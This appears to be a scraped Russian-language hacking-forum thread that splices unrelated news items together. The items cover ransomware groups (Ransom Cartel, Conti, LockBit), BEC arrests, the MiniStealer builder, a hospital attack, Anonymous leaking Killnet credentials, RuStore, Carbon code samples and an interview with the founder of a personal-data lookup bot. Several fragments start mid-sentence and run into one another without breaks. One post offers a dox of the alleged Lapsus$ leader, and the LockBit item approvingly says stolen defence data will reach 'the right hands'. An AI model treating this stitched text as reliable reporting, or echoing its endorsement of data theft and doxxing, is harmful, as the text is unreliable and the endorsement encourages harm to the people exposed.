По словам специалистов Unit 42, когда Ransom Cartel только появилась, было неясно чем она является – REvil под другим названием или никак не связанной с REvil группировкой, которая просто подражает печально известной банде хакеров.
Но когда Ransom Cartel начала использовать определенный набор инструментов, все начало вставать на свои места. Эксперты рассказали, что группировка использует не только популярные среди вымогателей тактики, но и необычные инструменты (например, DonPAPI, который ранее не применялся в атаках вымогателей).
Исследователи отмечают, что у операторов Ransom Cartel есть доступ к исходному коду шифровальщика REvil, но они не имеют в своем арсенале механизм обфускации, который используется для шифрования строк и скрытия вызовов API.
Опираясь на все вышесказанное, специалисты сделали вывод, что Ransom Cartel активно сотрудничала с REvil до того, как стала полноценной группировкой.
В заключении отчета Unit 42 предупреждает о возможном росте атак с использованием вредоносов от Ransom Cartel и призывает большие компании установить специальное защитное ПО, так как группировка нацелена именно на "крупную добычу".
Узнать больше технических подробностей о Ransom Cartel и ознакомиться с индикаторами компрометации можно здесь .
source: unit42.paloaltonetworks.com/ransom-cartel-ransomware | unit42.paloaltonetworks.com/ransom-cartel-ransomware
Американские власти задержали мошенников из группировки Black Axe, подозреваемых в BEC-скаме. Аресты произошли на прошлой неделе, и правоохранители сообщают, что задержанные входили в международный преступный синдикат, корни которого уходят в Нигерию.
BEC-скамом, от английского Business Email Compromise, называют классическую мошенническую схему, в рамках которой злоумышленники начинают переписку с сотрудником компании, стремятся завоевать его доверие и убедить выполнить действия, идущие во вред интересам компании или ее клиентам (как правило – перевести деньги на счет компании-партнера, под которую маскируются сами преступники). Зачастую для этого используются взломанные аккаунты других сотрудников или адреса, которые визуально похожи на официальные адреса компаний, но отличающиеся на несколько символов.
Как сообщают власти, одиннадцати подозреваемым были предъявлены обвинения в Северном округе Техаса, и еще 23 — в Восточном округе Техаса (причем одному подозреваемому предъявлены обвинения в обоих округах).
Считается, что группа Black Axe активна как минимум с января 2017 года и участвовала в широком спектре мошеннических атак, включая BEC-скам, мошенничество с инвестициями и мошенничество со страховками от безработицы. Кроме того, подозреваемые занимались мошенничеством в области романтических отношений, «работая» на таких сайтах знакомств, как Match.com, ChistianMingle, JSwipe и Plenty of Fish.
Согласно судебным документам, оказавшимся в распоряжении редакции издания [The Record](https://therecord.media/us-arrests-33-bec-scammers-linked-to-nigerian- crime-syndicate/), в общей сложности группа украла и отмыла более 17 000 000 долларов США, которые мошенники получили от 100 жертв.
Журналисты пишут, что все подозреваемые были [членами Black Axe](https://www.faz.net/aktuell/gesellschaft/kriminalitaet/investigation-on- the-neo-black-movement-a-k-a-black-axe-16898417.html), известного преступного синдиката, связанного с движением Neo Black Movement (NBM), основанным в 1970-х годах в Нигерии. Постепенно NBM превратилось в тайное общество и культ, а затем распространилось по всей Африке и другим странам. Если некогда NBM ставило перед собой цель с борьбы с расизмом, то впоследствии NBM, как и многие другие нигерийские братства, стало заниматься преступной деятельностью. По данным Интерпола, в наши дни NBM связано с проституцией, торговлей людьми, торговлей наркотиками, кражами в крупных размерах, отмыванием денег и киберпреступлениям (в основном BEC-скамом). При этом Black Axe – лишь другое название, которое используется для прикрытия некоторых операций NBM.
Арест 33 человек стал уже вторым ударом, нанесенным по группировке за последнее время: ранее, в апреле 2021 года итальянская полиция арестовала 30 членов Black Axe, предъявив им около 100 обвинений, включая торговлю наркотиками и людьми, проституцию и интернет-мошенничество.
• Source: justice[.]gov/usao-ndtx/pr/11-romance-scammers-charged-money- laundering-wire-fraud-conspiracies
• Source: justice[.]gov/usao-edtx/pr/edtx-indicts-two-dozen-defendants- international-multi-scheme-fraud-conspiracy
• Source: <https://www.documentcloud.org/documents/21069844-black-axe- indictment>
• Source: interpol.int/en/content/download/15525/file/Online%20African%20Organized%20Crime%20from%20Surface%20to%20Darkweb-17.08.2020.pdf
Бывший народный депутат Украины Дмитрий Голубов назначен помощником главы политсовета парламентской фракции «Оппозиционная платформа – За жизнь» Виктора Медведчука. Информация об этом появилась на сайте Верховной Рады.
Голубов стал помощником политика на общественных началах.
Крестным дочери Медведчука является президент РФ Владимир Путин.
Согласно декларации о доходах за 2019 год, Дмитрий Голубов владеет 4376 BTC (свыше $275 млн на текущий момент).
По информации The Wall Street Journal, экс-нардеп является лидером хакерской группировки Carderplanet, которая похитила с американских банковских счетов не менее $11,4 млн.
В июле 2005 года Голубова задержали в Одессе по подозрению в создании преступной организации. Полгода он отсидел в Лукьяновском СИЗО Киева, после чего вышел под залог 100 000 гривен. Свою вину политик отрицает.
Создание структуры обусловлено большим количеством компьютерных атак, дистанционных хищений денежных средств, активным развитием противоправной цифровой индустрии.
В МВД России создали специальное управление по борьбе с преступным использованием информационно-коммуникационных технологий. Соответствующие изменения в структуру ведомства внесены указом президента России Владимира Путина.
Сотрудники Управления будут бороться с преступлениями, которые совершаются в сфере IT-технологий, а также с запрещенным на территории РФ контентом. Необходимость появления нового ведомства связана с возросшим количеством таких преступлений, в частности с деятельностью хакеров и мошенников, которые дистанционно получают доступ к чужим накоплениям.
«Министр внутренних дел РФ Владимир Колокольцев поручил профильным подразделениям ведомства незамедлительно приступить к реализации Указа Президента. Формирование УБК МВД России будет осуществляться за счет перераспределения штатной численности органов внутренних дел и не потребует выделения дополнительного финансирования», - цитирует «Интерфакс» заявление представителя ведомства.
Сегодня каждое четвертое преступление совершается с помощью IT, напоминают в министерстве, поэтому необходима системная работа по борьбе с ними и структура, отвечающая за эту работу.
source: interfax.ru/russia/865726
Теперь проводить атаки могут даже неопытные киберпреступники.
Аналитики безопасности Cyble обнаружили пост злоумышленника на форуме
киберпреступников, в котором он бесплатно распространяет конструктор и панель
управления MiniStealer. По словам хакера, стилер может атаковать различные ОС,
включая Windows 7, 10 и 11.
[](https://www.securitylab.ru/upload/images/content-
img(422).png)
Пост киберпреступника на хакерском форуме
Распространяемые ZIP-файлы содержат установочный файл конструктора и исходный
код панели управления вредоносного ПО. Сборщик также помогает менее опытным
хакерам создавать вредоносную полезную нагрузку, в первую очередь для атаки
FTP-приложений и браузеров на основе Chromium. Кроме того, веб-панель можно
использовать для получения украденных данных из целевой сети.
[](https://www.securitylab.ru/upload/images/content-
img(423).png)
Панель MiniStealer
MiniStealer представляет собой 64-разрядный двоичный файл .NET, в котором используется метка времени (timestamping). MiniStealer использует несколько проверок антианализа, чтобы предотвратить отладку образца.
Чтобы обнаружить профилирование, код проверяет, присутствует ли переменная среды COR_ENABLE_PROFILING и установлена ли она в 1. MiniStealer также непрерывно проверяет, отлаживается ли полезная нагрузка.
Для FTP-приложения он крадет данные из файлов конфигурации. Для браузеров он
копирует определенные файлы в каталог AppData/Browser, в котором хранятся
учетные данные сеанса и входа пользователя.
После выпуска MiniStealer тот же кибепреступник опубликовал пост, в котором он
продавал сборщик и панель Parrot Stealer за $50. По его словам, Parrot Stealer
— это модифицированная версия MiniStealer
Эксперты заявили, что наличие бесплатных сборщиков вредоносного ПО и панелей помогает хакерам проводить успешные атаки за меньшее время. Поскольку похититель нацелен на различные ОС Windows, к этой угрозе нужно относиться с осторожностью. Кроме того, продвижение бесплатного вредоносного ПО только поощряет кибератаки и увеличит их количество.
source: blog.cyble.com/2022/08/29/mini-stealer-possible-predecessor-of-parrot- stealer
расположенный в 28 километрах от центра Парижа и обслуживающий территорию с населением 600 000 человек, [подвергся хакерской атаке](https://www.chsf.fr/declenchement-du-plan-blanc- dimanche-21-aout-2022/). Из-за взлома CHSF вынужден направлять пациентов в другие медицинские учреждения и отложить плановые операции.
Из-за атаки на компьютерную сеть CHSF временно недоступны бизнес-ПО больницы,
системы хранения (в частности, медицинские изображений), а также
информационная система, связанная с госпитализацией пациентов», — сообщает
руководство медицинского учреждения в официальном заявлении.
Технические детали случившегося не разглашаются, однако известно, что
вызванный атакой сбой длится до сих пор. Поэтому пациенты, нуждающиеся в
неотложной помощи, обследуются врачами CHSF, но если их состояние требует
диагностической визуализации, людей направляют в другие медицинские центры.
По сообщению издания [Le Monde](https://www.lemonde.fr/pixels/article/2022/08/22/un-hopital-de-l- essonne-victime-d-une-cyberattaque-son-activite-fortement- perturbee_6138677_4408996.html), которое ссылается на собственные источники в местных правоохранительных органах, атаковавшие CHSF злоумышленники, потребовали у администрации больницы выкуп в размере 10 000 000 долларов в обмен на ключ дешифрования.
По информации журналистов, сейчас это дело передано парижской жандармерии, а точнее специалистам из Центра борьбы с киберпреступностью (C3N). Из-за этого [предполагается](http://www.lemagit.fr/actualites/252524082/Derriere-la- cyberattaque-au-centre-hospitalier-Sud-Francilien-LockBit), что за атакой могут стоять вымогательские группировки LockBit 3.0 или Rangar Locker, так как атаками этих вымогателей обычно занимаются именно эксперты C3N. При этом нужно отметить, что LockBit 3.0 строго запрещает своим «партнерам» и аффилированным лицам атаковать и шифровать системы поставщиков медицинских услуг.
На конференции Cpp North был
представлен
экспериментальный язык программирования [Carbon](https://github.com/carbon-
language/carbon-lang) – преемник С++ (по заявлению разработчиков).
Разработчики обещают производительность, соответствующую C++, взаимодействие с
существующим кодом C++, от наследования до шаблонов, быстрые и масштабируемые
сборки, совместимые с существующими системами сборки C++, двунаправленную
интероперабельность с C++ и многое другое.
Code:Copy to clipboard
// Carbon:
package Geometry api;
import Math;
class Circle {
var r: f32;
}
fn PrintTotalArea(circles: Slice(Circle)) {
var area: f32 = 0;
for (c: Circle in circles) {
area += Math.Pi * c.r * c.r;
}
Print("Total area: {0}", area);
}
fn Main() -> i32 {
// A dynamically sized array, like `std::vector`.
var circles: Array(Circle) = ({.r = 1.0}, {.r = 2.0});
// Implicitly constructs `Slice` from `Array`.
PrintTotalArea(circles);
return 0;
}
C++:Copy to clipboard
// C++:
#include <math.h>
#include <iostream>
#include <span>
#include <vector>
struct Circle {
float r;
};
void PrintTotalArea(std::span<Circle> circles) {
float area = 0;
for (const Circle& c : circles) {
area += M_PI * c.r * c.r;
}
std::cout << "Total area: " << area << "\n";
}
auto main(int argc, char** argv) -> int {
std::vector<Circle> circles = {{1.0}, {2.0}};
// Implicitly constructors `span` from `vector`.
PrintTotalArea(circles);
return 0;
}

successor ](https://9to5google.com/2022/07/19/carbon-programming-language- google-cpp/)
Carbon, the latest programming language to be built within Google, was unveiled today as an experimental successor to C++.
 9to5google.com

documentation. ](https://github.com/carbon-language/carbon-lang)
Carbon language specification and documentation. Contribute to carbon- language/carbon-lang development by creating an account on GitHub.
github.com
Но продолжит влияние, разделившись на мелкие группы
По словам руководителя отдела исследований Advanced Intel Елисея
Богуславского, группировка Conti заявила о прекращении своей деятельности и
отключила инфраструктуру группы.
«Conti Ransomware больше нет! Сегодня официальный сайт Conti Ransomware был закрыт, что означает конец известной преступной группировки. Это действительно исторический день в разведывательном сообществе! (Intelligence Community, IC)» , - написал Богуславский в Twitter.
Несмотря на закрытие бренда Conti Ransomware , команда хакеров еще долго будет играть важную роль в индустрии вымогателей. Согласно Advanced Intel, переговорщики, аналитики, пентестеры и разработчики Conti теперь работают в более мелких группировках, но все еще остаются частью крупного синдиката Conti. Разделившись на более мелкие «ячейки», Conti получила мобильность и большую способность уклоняться от правоохранительных органов. Все мелкие команды хакеров по-прежнему будут управляться центральным руководством группировки.
Согласно отчету Advanced Intel, Conti сотрудничает с HelloKitty, AvosLocker,
Hive, BlackCat, BlackByte Karakurt, Bazarcall и другими. Новые автономные
группы, созданные членами Conti, будут сосредоточены на краже данных, а не на
их шифровании. Существующая команда киберпреступников продолжит свою
деятельность, но уже не под именем Conti.
Портал утечки данных «Conti News» и сайты переговоров о выкупе все еще
активны, но панели Tor администратора для проведения переговоров и публикации
украденных данных теперь отключены. Также неактивны серверы чата.
Завершение деятельности Conti произошло в разгар кибервойны с Коста-Рикой . По
словам Богуславского, Conti предприняла эту публичную атаку для сокрытия
реальной операции. В этот момент группа постепенно перешла к более мелким
вымогательским операциям. Согласно Advanced Intel, план проведения атаки на
Коста-Рику был объявлен Conti для рекламы , а не для получения выкупа.
Anonymous выложили в сеть данные участников пророссийской хакерской группировки Killnet.
Как [сообщает](https://gagadget.com/133878-anonymous-slili-v-set-dannyie- prorossijskih-hakerov-killnet/) gagdget.com, хактивисты опубликовали электронные адреса и пароли членов хакерской банды.
База данных была выложена на сайте JustPaste , и посмотреть ее может любой желающий.
Напомним, что ранее Anonymous официально объявили кибервойну российской группировке Killnet. Соответствующее заявление появилось 21 мая 2022 года в официальном Twitter-аккаунте Anonymous.
Затем Anonymous опубликовали новое сообщение, в котором заявили об уничтожении официального сайта Killnet. Атакуя российскую группировку снова и снова, Anonymous хотят положить конец кибератакам Killnet.
Источник: securitylab.ru/news/531900.php
VK при поддержке Минцифры России разработала и запустила бета-версию магазина приложений RuStore для пользователей мобильных устройств под управлением операционной системы Android. Загрузить RuStore на смартфон можно на официальной странице магазина rustore.ru .
На старте бета-версии пользователям доступно более 100 приложений, в том числе популярные сервисы VK, Яндекса и Сбера, Госуслуги, приложения мобильных операторов, маркетплейсы, игры и многое другое. Количество приложений в магазине растет ежедневно. Для части разработчиков открыт личный кабинет, который позволяет самостоятельно загружать приложения в RuStore. В ближайшее время личный кабинет будет открыт для всех. Поддержку пользователей и разработчиков в режиме 24/7 осуществляет специальная сервисная служба VK.
В бета-версию RuStore интегрированы системы безопасности «Лаборатории Касперского» и VK. Решения «Лаборатории Касперского» будут помогать VK модерировать загружаемые приложения —проверять их на отсутствие вредоносного кода. Согласно дорожной карте проекта планируется, что летом текущего года в RuStore будет интегрирована платформа push-уведомлений, платежная система, а также появятся рейтинги приложений. До конца года будут запущены аналитические и маркетинговые инструменты.
«Создание российского стора — важнейшая задача, продиктованная рыночными условиями. Мы провели большую подготовительную работу как с точки зрения законодательного регулирования, так и с точки зрения создания благоприятных условий для совместной работы лидеров российской ИТ-индустрии над этим проектом. Инициатива создания RuStore исходит от бизнеса — и это самый правильный путь для запуска качественного и безопасного сервиса, удобного и для пользователей, и для разработчиков приложений. Работу над магазином возглавляет команда VK, которая в партнерстве с другими ИТ-компаниями создает его как коммерческий проект, без государственного финансирования. Уверен, что, следуя четко проработанному плану, команде удастся создать востребованный и конкурентный магазин приложений», — прокомментировал министр цифрового развития, связи и массовых коммуникаций Максут Шадаев.
«RuStore — полноформатный магазин приложений, в котором будут все самые современные и безопасные сервисы как для пользователей, так и для разработчиков. VK создает его в партнерстве с крупнейшими российскими ИТ- компаниями при поддержке Минцифры России. Это яркий пример эффективной коллаборации, когда лучшие игроки ИТ-рынка объединились для решения общей задачи на благо пользователей. Сейчас мы находимся в самом начале пути. У нас есть четкий план последовательного развития RuStore, реализация которого позволит нам в обозначенные сроки интегрировать в стор необходимые системы и платформы. Уверен, что RuStore будет востребован как у пользователей, так и у разработчиков — и у него есть всё, чтобы стать крупнейшим российским магазином приложений», — отметил генеральный директор VK Владимир Кириенко.
«Мы приветствуем создание отечественного магазина приложений для мобильных устройств. При этом мы понимаем, что безопасность данных и денег пользователей требует обеспечения всесторонней защиты. Перед публикацией в RuStore приложения будут проверяться нашими решениями на наличие вредоносного кода. Это необходимо для выявления самых разных киберугроз, включая троянские программы, нежелательное рекламное, шпионское и фишинговое программное обеспечение. Для этого применяются новейшие защитные технологии компании, в том числе на базе машинного обучения. При необходимости приложения также будут анализироваться решением класса „песочница” — инструментом, который позволяет в процессе исследования провести поведенческий анализ файлов и обнаружить продвинутые угрозы», — поясняет Михаил Прибочий, управляющий директор «Лаборатории Касперского» в России и странах СНГ.
source: vk.company/ru/press/releases/11165
вброс?
Канадский оборонный подрядчик Top Aces Inc стал жертвой атаки с использованием ransomware. Отличились LockBit, на DLS которых теперь красуется эксклюзивный поставщик для вооруженных сил Канады и Германии.
Top Aces Inc - оборонный подрядчик из Монреаля (Квебек), который реализует услуги по обучению воздушно-десантных войск (CATS) Канады, имеет крупнейший в мире собственный парк модернизированных истребителей для репликации угроз Red Air, обучения JTAC, тренировочного сброса боеприпасов, обучения стрельбе в воздухе и буксировки морских целей для канадских и немецких вооруженных сил.
Кроме того, Top Aces обеспечивает обучение радиоэлектронной борьбе Королевских ВВС Канады (RCAF) в рамках контракта CATS, предлагая в том числе расширенные испытания радаров в приближенных к боевым условиям. С 2017 года Top Aces также принимает участие в обучении Сил обороны Австралии, а с 2019 - ВВС США, контракт с которыми включает в качестве отдельного пункта обучение защите от российского вооружения.
Представители Top Aces подтвердили начало расследования инцидента. Теперь у компании осталось два дня, чтобы решить проблему выкупа, иначе 15 мая 44 ГБ эксфильтрованных данных порадуют разведки всех стран.
Последний факт беспокоит не только военных, опасения высказывают и ресерчеры. В числе которых отметился аналитик Emsisoft Бретт Кэллоу, который высказал возрастающую опасность атак на компании в сфере оборонно-промышленного комплекса, последние из которых включают инциденты с Visser Precision (поставщик запчастей для Lockheed Martin) и Westech International (военный подрядчик в области ядерных технологий Minuteman III).
Не разделяем переживания коллег по поводу того, что украденные в ходе атак сведения могут попасть не в те руки. Поверьте - попадут туда, куда нужно.
Еще раз подчеркнем латентный характер криминальной ransomware-индустрии. По данным Russian OSINT, группировка LockBit недавно засветила скриншот панели с указанием 12 125 компаний в качестве жертв при том, что на DLS опубликовано 850+ компаний. В денежном эквиваленте совокупный доход группировки может составить: 12 125 x $100,000 (минимум) = $1,212,500,000.
Поэтому Emsisoft точно не стоит переживать и за возрастающее количество инцидентов в военной или другой сфере - их и без того достаточно.
Замглавы ФСИН Александр Хабаров на конференции в Новосибирске заявил, что привлекать IT-специалистов к удалённой работе на бизнес предложили в ряде регионов.
Таких специалистов не так много. К нам с этой инициативой выходят в ряде территорий, в ряде субъектов предприниматели, которые в этой области работают. Мы только на начальном этапе. Если это востребовано, а это, скорее всего, востребовано, думаем, что мы специалистов в этой области не будем заставлять работать на каких-то других производствах.
Александр Хабаров
замглавы ФСИН
Для них создадут центры, форма наказания в которых — исправительные работы.
Благодаря дистанционному формату работы отбывающие наказание специалисты
смогут работать для компаний в разных регионах.
По его словам, в исправительных центрах осужденные трудятся в самых разных
сферах, и вполне можно было бы добавить.
source: tass.ru/obschestvo/14489179
TO THE MODS: THIS INFORMATION IS FROM 3RD PARTY SOURCES, IT IS EDUCATIONAL
AS IT SHOWCASES BAD OPSEC IN HOPES OTHERS LEARN FROM THE MISTAKES OF OTHERS.
IF YOU HAVE A PROBLEM PLEASE RESTRICT OR REMOVE THE THREAD. I'M JUST RELAYING
INFO.
NVIDIA + Samsung recently suffered a data breach, however 2 months prior:
Lapsus$ ransomware's owner "Lapsus$" Was doxed by doxbin's staff. However
NVIDIA nor Samsung wants to do anything regarding the matter.
LAPSUS$ is 16 almost 17 year old autistic skid whom previously lived in the
United Kingdom and bought a website called "Doxbin" for $75,000 USD after
running the site for a while he completely derailed it via lack of care.
KT the owner of the site inquired about it, although he was active in
LAPSUS$'s group chat during that time.... completely lacking the care to
maintain a website he bought. After numerous issues finally he put doxbin back
up for sale.
Both the former admins re-bought the site. Unfortunately LAPSUS$ wasn't happy
and tried to steal the discord vanity URL which was replaced in 2 hrs. He than
took to twitter to request the dox of the former admin and would pay $100k
USD.
However the reinstated admin broke in to the twitter and basically attacked
him for using bad passwords/reusing them. Over the next few days. He was
bullied until ultimently leaking doxbin's User base which the database
included emails, passwords, usernames, user agents, 2FA codes and hashed
passwords. Nothing too major.
With the whole backstory out of the way: LAPSUS$ Had the police called on him, they showed up to his mother's house which he wasn't there so they drove down the road to his father's house which he was in the process of fleeing. He's now in spain hacking companies like Samsung and NVIDIA.
Here is the official dox of LAPSUS$ Ransomware's owner. Figured this should help anyone effected by this little worm who has bad opsec as well help others not make the same mistakes.
You must spend at least 60 day(s) on the forum to view the content.
сделаю» Интервью создателя «Глаза Бога» Евгения Антипова — об отравлении Навального, сотрудничестве с силовиками и грядущей войне с Telegram
В начале июля из Telegram пропали канал и чаты «Глаза Бога» — одного из главных российских ботов, предлагающих услуги «пробива». Блокировка началась после решения суда, который принял сторону Роскомнадзора (РКН) и обвинил «Глаз Бога» в нарушении прав граждан на «личную и семейную тайну». Это не первая подобная площадка, заблокированная по требованию властей — но реальную кампанию против черного рынка личных данных РКН начал лишь после публикации [расследования Bellingcat](https://meduza.io/feature/2020/12/16/ne-tak-to- prosto-otravit-cheloveka-novichkom) о слежке ФСБ за Алексеем Навальным и его отравлении. Оно было основано на сведениях, полученных с помощью «пробива». Истории с «Новичком» силовики «боятся как Воландеморта», считает основатель «Глаза Бога» Евгений Антипов. Спецкор «Медузы» Лилия Яппарова поспорила с ним о законности проекта, узнала, как в «Глазе Бога» ставят «на монитор» эфэсбэшников и журналистов, откуда у Антипова несколько десятков грамот от госструктур — и следит ли он за своими клиентами по запросам силовиков.
— 2 июля, спустя сутки после судебного решения о блокировке, из Telegram пропала вся ваша инфраструктура — канал на миллион подписчиков, несколько чатов. Как это происходило?
— Еще утром в пятницу [2 июля] мы были совершенно спокойны: все работало, все было хорошо. Суд накануне вообще постановил удалить бот, который не имел к нам никакого отношения: видимо, при составлении иска в Роскомнадзоре просто ввели в поиске телеграма [словосочетание] «Глаз Бога» — и вписали [в жалобу] первый попавшийся им левый бот, который нас копировал. В приговоре в итоге реально было сказано только об удалении этого фейка.
И вдруг днем пропадает наш канал. Якобы «за нарушения правил Telegram» удалили канал, чат техподдержки и флудилку, админские чат и бот — я так понимаю, просто зачистили все, что было создано с моего аккаунта.
Причем специально выбрали такой момент, чтобы максимально убить все: [команда] Telegram отключила бот перед выходными, чтобы я не смог до них достучаться. И даже удаляла так, чтобы именно на моем аккаунте и канал, и чаты продолжали работать — это чтобы я максимально долго ничего не замечал! Я прямо сейчас вижу, как люди потихоньку выходят из канала.
— Вы пытались связаться с командой Telegram?
— Официальных заявлений от них не было. Когда мы [в ту же пятницу] начали запускать клоны нашего официального бота, то пытались дублировать его под разными названиями: «Роскомнадзор» или «Привет, Telegram!» Но они все-все-все чистили, примерно пару тысяч ботов за два-три часа. Причем видно, что удаляли вручную: какие-то боты улетали моментально — так быстро, что даже не успевали включаться, — а какие-то успевали проработать 10-15 минут, как будто сотрудники Telegram в этот момент в туалет отходили.
— Что будете делать?
— Обидно за Telegram: никак не ожидал, что они могут взять и просто без причины все удалить. Придется, наверное, сейчас уйти оттуда, если они не ответят в течение какого-то времени. Я им сказал открыто: давайте пожмем руки. Снимите блок хотя бы с канала — я не буду понтоваться, что вы это сделали: подам апелляцию [о восстановлении аккаунта], все по правилам.
Если этого не произойдет, я настроен уйти [с их площадки] и все, что у меня на них есть — а есть у меня сильно много — вылить в сеть. Все их сообщения, все голосовые, где они рассказывают, как сливают информацию всем подряд. И про коррупцию в Telegram, и про их связь с РКН — все-все абсолютно. Вот это будет война, вот это будет дерзко. Чтобы стало понятно, насколько Telegram в целом плевать [на пользователей].
— Я правильно понимаю, что вы собираетесь вести с Telegram войну компроматов?
— Во-первых, я просто запущу свой мессенджер — и переманю к себе толпу людей, чтобы потом просто красиво ее у них забрать. Не вижу технических проблем, чтобы сделать сервис быстрее. Чистый доход у «Глаза» сейчас в среднем составляет от восьми до 15 миллионов рублей в месяц, и я огромные ресурсы оттуда трачу на новый продукт: делаю свой мессенджер, готовлюсь к атаке на Telegram, делаю все сам абсолютно.
Мне сейчас пишут все: «Жень, давай собирай все доказательства и максимально уничтожай Telegram: что он плохой, сливает данные, чтобы все из него уходили». Не понимаю такое: зачем валить Telegram, не дав людям альтернативу? А можно выйти и объявить: «Я создал свой мессенджер „Глаз Бога“ — переходите все туда, потому что Telegram плохой».
Telegram не стал комментировать «Медузе» утверждения Антипова о том, что компания сотрудничет с российскими силовиками, и другие его заявления.
Click to expand...
— А за «Глаз Бога» как проект по торговле данными вы планируете бороться?
— Сейчас, когда мы с вами говорим [7 июля 2021 года], бот работает: они перестали удалять клоны вечером в пятницу, как будто у них рабочее время закончилось. И даже если снова начнут блокировать, нам это никак не помешает: мы учим подписчиков «Глаза Бога» создавать собственные боты и максимально их распространять. У нас для такого клонирования есть бот специальный — а сейчас еще и сайт появится, куда можно будет зайти и создать собственного бота, персонально вашего, которого никто никогда не найдет. Мы их называем «боты- франшизы» — их уже 575 тысяч. До блокировки было 370 тысяч. Зачем нам держать свой бот и бегать его прятать, если можно выстроить целую экосистему, которую вообще никак не остановить будет?
— На прошлой неделе вы[проиграли](https://mbk- news.appspot.com/news/glaz-boga-3/)Роскомнадзору иск — почему тогда исполнение компанией Telegram решения суда о блокировке стало для вас едва ли не неожиданностью?
— Просто про наши чаты, сайты и канал ни в иске, ни на суде никто не говорил — почему их удаляют тогда? Получается, суд себе взял больше полномочий? Сказали бы, что «хотим удалить еще и канал, потому что он настраивает против России». Но нет же, просто молча удалили — и все.
— Переговоры с РКН какие-то ведутся?
— Там трубки не берут, на письма не отвечают. В чем заключается обвинение («Медуза» ознакомилась со скриншотами работы одного из клонов «Глаза Бога», приложенными к исковому требованию, — прим. «Медузы»): человек кидает в бот свой номер телефона — и находит свой аккаунт «ВКонтакте». Все. Эксперты РКН не купили подписку, поэтому все, что они увидели — это фото из вотсапа и несколько тегов из GetContact. И упоминание — без подробностей, — что в боте есть сведения об адресе и номере машины. Ого, какие секретные данные, надо запрещать.
Мы в суде даже спрашивали: а кто вообще на нас за такое пожаловался в РКН? Они говорят: «Иванов Иван Иванович и Федоров Иван Иванович». Мы даже переспросили, не прикол ли это такой — оказалось, они серьезно. Может быть, и правда обиделся кто-то — не думаю все-таки, что Роскомнадзор сам придумал этих двух Иванов.
— Вы, кажется, единственный бот по «пробиву», попытавшийся хоть как-то «легализоваться» после первых массовых блокировок таких ресурсов, которые Роскомнадзорустроилв марте. Не помогло?
— Мне говорили, что это был заказ против нас. Человеку из моей команды писали, что на нас «давят люди посерьезней РКН» и что дышать нам «будет тяжело». Я тогда подумал про людей, которые хотят, чтобы я с ними поделился. И помощь от них принял. Никому не нужен «Глаз Бога» как доход, но мне уже давно все напрямую сказали, что очень интересно будет получить доступ к логам: кто что ищет. Были предложения купить и бот, и просто покупать поиски людей, в том числе людей с конкретными ID — за 10 миллионов в месяц, 20 миллионов месяц.
— На вас какие-то переговорщики выходили, получается?
— С предложением «решить все вопросы и проблемы» выходило много людей. Отовсюду звонят, от «силовиков» до «администрации РКН» и даже «администрации президента» — и предлагают «все решить». «Мы сотрудники силовых структур, заинтересованные в ваших разработках». «Мы из АП, нам нужно посмотреть данные на некоторых людей». Мы на такие встречи не соглашаемся — да и невозможно сказать, кто это на самом деле звонит.
В какой-то момент на нас с предложением «решить проблемы» вышли люди, которые реально могли их решить, потому что они же их и создавали: писали на нас жалобы в Visa и Mastercard, что мы якобы занимаемся деятельностью, с террористами связанной — и что нужно отобрать лицензию у [агрегатора платежей] Robokassa за то, что те работают с такими вот «террористическими проектами». В итоге заблокировали нам Robokassa.
— А что за люди?
— Появились крупные компании российские, фонды, которые говорили: «Все, мы готовы проинвестировать в тебя, Жень. Давай нам 40% — а мы тебе юридическую, финансовую, партнерскую помощь». Точнее не могу сказать пока, чтобы не было проблем больших. Это не люди, а компании, которые много кому известны.

](https://www.instagram.com/p/BSqDVR8AoLD/?utm_source=ig_embed&utm_campaign=loading)
50 likes, 3 comments - pavel_vrublevsky on April 9, 2017: "Умный ж да? )))".
 www.instagram.com
Павел Врублевский
— Я уже слышала эту историю — правда, в другом пересказе: собеседник «Медузы», осведомленный о конфликте «Глаза» с РКН, рассказывал, что на ваш бизнес могли претендовать еще и люди из ФСБ, с подачи которых и могло оказываться давление на бот — в том числе информационная кампания телеграм- канала BadBank,[приписываемого](https://sportclan.ru/blog/tonny-hajpa- ob-antigembling-kampanii-vrublevskogo/) владельцу процессинговой компании ChronoPay Павлу Врублевскому. Канал давно воюет с платежными системами, сотрудничающими с онлайн-казино и «пробивом», но партнерству «Глаза» с Robokassa посвятил целуюсерию постов, что якобы ипривелок разрыву ваших отношений с агрегатором.
— Эфэсбэшников не было. А у BadBank была война не со мной, а с ВТБ. (Канал BadBank действительно часто критикует за работу с даркнетом агрегаторы платежей, чьим банком-эквайером — то есть обработчиком платежей по карточкам — выступает именно ВТБ, — прим. «Медузы».) Врублевский, если он действительно стоит за BadBank, наехал на ВТБ [и их партнеров Robokassa], но ему ответили, что «„Глаз Бога“ — классные пацаны — мы не будем их прессовать». И он такой: «Как так!» И начал атаковать вот эту сторону.
Позиция Врублевского:
Павел Врублевский отрицает, что писал жалобы на «Глаз бога» в Visa или Mastercard, и отвергает версию о своей связи с координируемой сотрудниками ФСБ атакой на бот.
Отрицает предприниматель и связь с каналом BadBank. «Я полностью поддерживаю деятельность канала — душой и сердцем с ним, но я никогда не подтверждал, что управляю им», — сказал Врублевский «Медузе».
Врублевский, тем не менее, хорошо знаком с обстоятельствами ставшего публичным конфликта между BadBank, ВТБ и Robokassa. «Антипов правильно описывает вам этот конфликт: у канала была проблема не столько с „Глазом Бога“, сколько с тем, что Robokassa полезла в канал с заявлениями, что бизнес бота действует законно. Но канал не жаловался ни в Visa, ни в Mastercard — тут Евгений не прав», — уточняет Врублевский в разговоре с «Медузой».
Версию о своей совместной с сотрудниками ФСБ атаке на «Глаз Бога» Врублевский считает надуманной. «BadBank действительно много писал о ситуации, но потом у „Коммерсанта“ вышла целая серия статей на ту же тему — и они были написаны на основе и материалов BadBank, и, вероятно, каких-то силовых источников самих журналистов — вот вам и происхождение идеи о „вмешательстве ФСБ“. А когда на волне публикации выяснилось, что Robokassa и ВТБ просто не учли, что 1 марта [2021 года] ужесточилось законодательство в отношении персональных данных и подобных ботов, им действительно пришлось отключить „Глаз“».
